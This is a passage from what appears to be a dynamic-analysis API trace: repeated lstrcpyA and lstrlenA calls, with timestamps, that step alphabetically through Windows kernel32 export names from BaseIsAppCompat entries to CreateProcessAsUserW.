(lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.227] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.227] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.227] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.227] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.227] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.227] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.227] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.227] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.227] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.227] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.227] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.227] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.227] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.227] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.228] lstrlenA (lpString="BEEP") returned 4 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.228] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.228] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.228] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.228] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.228] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.228] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.228] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.228] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.228] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.228] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.228] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.228] lstrlenA (lpString="CANCELIO") returned 8 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.228] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.228] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.228] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.228] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.228] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.229] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.229] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.229] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.229] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.229] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.229] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.229] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.229] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.229] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.229] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.229] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.229] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.229] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.229] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.229] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.229] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.229] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.230] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.230] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.230] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.230] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.230] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.230] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.230] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.230] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.230] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.230] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.230] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.230] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.230] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.230] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.230] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.230] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.230] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.230] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.231] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.231] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.231] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.231] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.231] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.231] lstrlenA (lpString="COPYFILEA") returned 9 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.231] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.231] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.231] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.231] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.231] lstrlenA (lpString="COPYFILEW") returned 9 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.231] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.231] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.231] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.231] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.231] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.231] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.231] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.232] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.232] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.232] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.232] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.232] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.232] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.232] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.232] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.232] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.232] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.232] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.232] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.232] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.232] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.232] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.232] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.232] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.232] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.233] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.233] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.233] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.233] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.233] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.233] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.233] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.233] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.233] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.233] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.233] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.233] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.233] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.233] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.233] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.233] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.233] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.233] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.233] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.234] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.234] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.234] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.234] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") 